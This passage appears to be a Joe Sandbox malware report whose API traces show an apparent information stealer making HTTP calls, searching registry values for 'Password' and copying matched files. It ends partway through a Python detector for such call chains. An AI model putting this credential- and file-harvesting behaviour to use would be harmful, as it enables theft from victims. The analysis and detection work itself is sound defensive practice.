                                                                                  • Instruction ID: fcd550830cc83d550b96cdc0740e81d452c81f9f3efe10ae1468fc936f70fc5c
                                                                                  • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                                                  • Instruction Fuzzy Hash: CC61A2B5511218ABCB14EBA0DD86FED7778AF44704F8041E9B70966082EE746BC8CF5A
                                                                                  APIs
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A51
                                                                                    • Part of subcall function 00B04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A68
                                                                                    • Part of subcall function 00B04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A7F
                                                                                    • Part of subcall function 00B04A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B04AA0
                                                                                    • Part of subcall function 00B04A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B04AB0
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B04B7C
                                                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B04BA1
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B04D21
                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 00B0504F
                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B0506B
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B0507F
                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B050B0
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B05114
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B0512C
                                                                                  • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B04D7C
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B05136
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                  • String ID:
                                                                                  • API String ID: 2402878923-0
                                                                                  • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                                                  • Instruction ID: 275390381ff466913b49cdb09c088d6a4d9a8a475106f5e618b36e3a6885c700
                                                                                  • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                                                  • Instruction Fuzzy Hash: B112AB72911218AACB15EB90DD92EEEB7B9AF15700F9041D9B10A72491EF743FC8CF52
                                                                                  APIs
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A51
                                                                                    • Part of subcall function 00B04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A68
                                                                                    • Part of subcall function 00B04A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B04A7F
                                                                                    • Part of subcall function 00B04A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B04AA0
                                                                                    • Part of subcall function 00B04A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B04AB0
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 00B06548
                                                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B0656A
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B0659C
                                                                                  • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B065EC
                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B06626
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B06638
                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00B06664
                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B066D4
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B06756
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B06760
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00B0676A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3074848878-0
                                                                                  • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                                                  • Instruction ID: ace687d510e1ff4e87dbc515d438c415734849cfc91d97711a65686ad2b3b80e
                                                                                  • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                                                  • Instruction Fuzzy Hash: 79715C75A40218ABDB24DBA0DC89BEE7BB5FF44700F508199F50A6B1D0DBB56E84CF42
                                                                                  APIs
                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B192D3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateGlobalStream
                                                                                  • String ID:
                                                                                  • API String ID: 2244384528-0
                                                                                  • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                                                  • Instruction ID: f14824274ee7e7863aa41c7bc9f1bc860cd5ad1cf498960c9dc811907fdd4a45
                                                                                  • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                                                  • Instruction Fuzzy Hash: DC711CB9A40208ABDB14DFE4DC95FEEBBB9FF48300F108548F515A7290DB34A945CB61
                                                                                  APIs
                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                                                                  • memset.MSVCRT ref: 0041716A
                                                                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                                                                  Strings
                                                                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                                                                  • sA, xrefs: 00417111
                                                                                  • sA, xrefs: 004172AE, 00417179, 0041717C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: OpenProcesslstrcpymemset
                                                                                  • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                  • API String ID: 224852652-2614523144
                                                                                  • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                                                  • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                                                                  • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                                                  • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                                                                  APIs
                                                                                    • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                                                                    • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                                                    • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                                                    • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                                                    • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                                                    • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                                                  • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                                                                  • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                                                                  • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                                                                  • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                                                                  • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                                                                  • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                                                                  • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                                                                  • task.LIBCPMTD ref: 004076FB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                  • String ID: :
                                                                                  • API String ID: 3191641157-3653984579
                                                                                  • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                                                  • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                                                                  • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                                                  • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                                                                  APIs
                                                                                  • lstrcpy.KERNEL32(?,?), ref: 00B11642
                                                                                    • Part of subcall function 00B19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B19072
                                                                                    • Part of subcall function 00B194C7: StrStrA.SHLWAPI(?,?), ref: 00B194D3
                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B1167E
                                                                                    • Part of subcall function 00B194C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 00B194F7
                                                                                    • Part of subcall function 00B194C7: lstrlen.KERNEL32(?), ref: 00B1950E
                                                                                    • Part of subcall function 00B194C7: wsprintfA.USER32 ref: 00B1952E
                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B116C6
                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B1170E
                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B11755
                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B1179D
                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B117E5
                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B1182C
                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00B11874
                                                                                    • Part of subcall function 00B1AA87: lstrlen.KERNEL32(00B0516C,?,?,00B0516C,00420DDE), ref: 00B1AA92
                                                                                    • Part of subcall function 00B1AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B1AAEC
                                                                                  • strtok_s.MSVCRT ref: 00B119B7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 4276352425-0
                                                                                  • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                                                  • Instruction ID: 8ff0994e12e337c0c577fe00bc5d7f7073759cdd47d315d728255e437861d26d
                                                                                  • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                                                                  • Instruction Fuzzy Hash: 977170B6951118ABCB14FBA0DC99EEE73B9AF64300F4049D8B10DA3141EA75ABC4CF61
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00407314
                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                                                  • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                                                    • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                                                                  • task.LIBCPMTD ref: 00407555
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                  • String ID: Password
                                                                                  • API String ID: 2698061284-3434357891
                                                                                  • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                                                  • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                                                                  • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                                                                  • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                                                                  APIs
                                                                                  • lstrcatA.KERNEL32(?,00909B30,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00414820
                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00414834
                                                                                  • lstrcatA.KERNEL32(?,008D5E28), ref: 00414847
                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                                                                  • lstrcatA.KERNEL32(?,0090A1D0), ref: 0041486F
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                                                    • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                                                    • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                                                    • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                                                                    • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                  • String ID: 0aA
                                                                                  • API String ID: 167551676-2786531170
                                                                                  • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                                                  • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                                                                  • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                                                                  • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0090A010,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,0090A010,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                                                                  • __aulldiv.LIBCMT ref: 00418172
                                                                                  • __aulldiv.LIBCMT ref: 00418180
                                                                                  • wsprintfA.USER32 ref: 004181AC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                  • String ID: %d MB$@
                                                                                  • API String ID: 2886426298-3474575989
                                                                                  • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                                                  • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                                                                  • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                                                  • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00B14FEE
                                                                                    • Part of subcall function 00B19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B19072
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B15017
                                                                                  • lstrcat.KERNEL32(?,00421000), ref: 00B15034
                                                                                    • Part of subcall function 00B14B77: wsprintfA.USER32 ref: 00B14B93
                                                                                    • Part of subcall function 00B14B77: FindFirstFileA.KERNEL32(?,?), ref: 00B14BAA
                                                                                  • memset.MSVCRT ref: 00B1507A
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B150A3
                                                                                  • lstrcat.KERNEL32(?,00421020), ref: 00B150C0
                                                                                    • Part of subcall function 00B14B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00B14BD8
                                                                                    • Part of subcall function 00B14B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00B14BEE
                                                                                    • Part of subcall function 00B14B77: FindNextFileA.KERNEL32(000000FF,?), ref: 00B14DE4
                                                                                    • Part of subcall function 00B14B77: FindClose.KERNEL32(000000FF), ref: 00B14DF9
                                                                                  • memset.MSVCRT ref: 00B15106
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B1512F
                                                                                  • lstrcat.KERNEL32(?,00421038), ref: 00B1514C
                                                                                    • Part of subcall function 00B14B77: wsprintfA.USER32 ref: 00B14C17
                                                                                    • Part of subcall function 00B14B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 00B14C2C
                                                                                    • Part of subcall function 00B14B77: wsprintfA.USER32 ref: 00B14C49
                                                                                    • Part of subcall function 00B14B77: PathMatchSpecA.SHLWAPI(?,?), ref: 00B14C85
                                                                                    • Part of subcall function 00B14B77: lstrcat.KERNEL32(?,0064A524), ref: 00B14CB1
                                                                                    • Part of subcall function 00B14B77: lstrcat.KERNEL32(?,00420FF8), ref: 00B14CC3
                                                                                    • Part of subcall function 00B14B77: lstrcat.KERNEL32(?,?), ref: 00B14CD7
                                                                                    • Part of subcall function 00B14B77: lstrcat.KERNEL32(?,00420FFC), ref: 00B14CE9
                                                                                    • Part of subcall function 00B14B77: lstrcat.KERNEL32(?,?), ref: 00B14CFD
                                                                                    • Part of subcall function 00B14B77: CopyFileA.KERNEL32(?,?,00000001), ref: 00B14D13
                                                                                    • Part of subcall function 00B14B77: DeleteFileA.KERNEL32(?), ref: 00B14D98
                                                                                  • memset.MSVCRT ref: 00B15192
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                  • String ID:
                                                                                  • API String ID: 4017274736-0
                                                                                  • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                                                  • Instruction ID: ae96633f70f5b5e0c20da5d5221898da884431ba6d57f5b3b894e7a3a0bcadd0
                                                                                  • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                                                                  • Instruction Fuzzy Hash: 9D4197B9A4021467D714F7B0EC47FDD7778AF24701F8044D4B689660C1EEB997D88B92
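The two function summaries above (the HKCU registry walk that calls StrStrA with "Password" at 0040740D, and the FindFirstFileA / PathMatchSpecA / CopyFileA / DeleteFileA loop in subcall 00B14B77) are the kind of API chains an analyst wants to pull out of this report automatically. The following is an added example, not Joe Sandbox code and not code from the sample: a small parser for the "APIs" trace-line format shown on this page that decodes the RegOpenKeyExA root handle and access mask using the documented Win32 constants, then flags the two behaviours by call order. The sample trace is constructed by copying lines from the summaries above; the behaviour labels and the `flag_behaviours` heuristic are this example's own assumptions, not report fields.

```python
"""Parse Joe Sandbox 'APIs' trace lines and flag stealer-style call chains (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: trace lines copied from the function summaries on this page.
SAMPLE_TRACE = """\
• memset.MSVCRT ref: 00407314
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
• RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
• StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
• GetProcessHeap.KERNEL32(00000000,?,?), ref: 00407452
• HeapFree.KERNEL32(00000000,?), ref: 00407459
  • Part of subcall function 00B14B77: FindFirstFileA.KERNEL32(?,?), ref: 00B14BAA
  • Part of subcall function 00B14B77: PathMatchSpecA.SHLWAPI(?,?), ref: 00B14C85
  • Part of subcall function 00B14B77: CopyFileA.KERNEL32(?,?,00000001), ref: 00B14D13
  • Part of subcall function 00B14B77: DeleteFileA.KERNEL32(?), ref: 00B14D98
"""

# One trace line: optional "Part of subcall function XXXX:", API.MODULE, optional (args), ref: ADDR
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Win32 predefined registry roots and composite access masks (winreg.h values).
HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_RIGHTS = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
HEX8 = re.compile(r"[0-9A-Fa-f]{8}")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int
    subcall: Optional[int]  # function id for "Part of subcall function" lines, else None


def parse_trace(text: str) -> List[ApiCall]:
    """Turn trace lines into ApiCall records; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def decode_reg_open(call: ApiCall) -> Dict[str, str]:
    """Name hKey and samDesired of a RegOpenKeyExA call; unresolved '?' args are left as-is."""
    root, sam = call.args[0], call.args[3]
    return {
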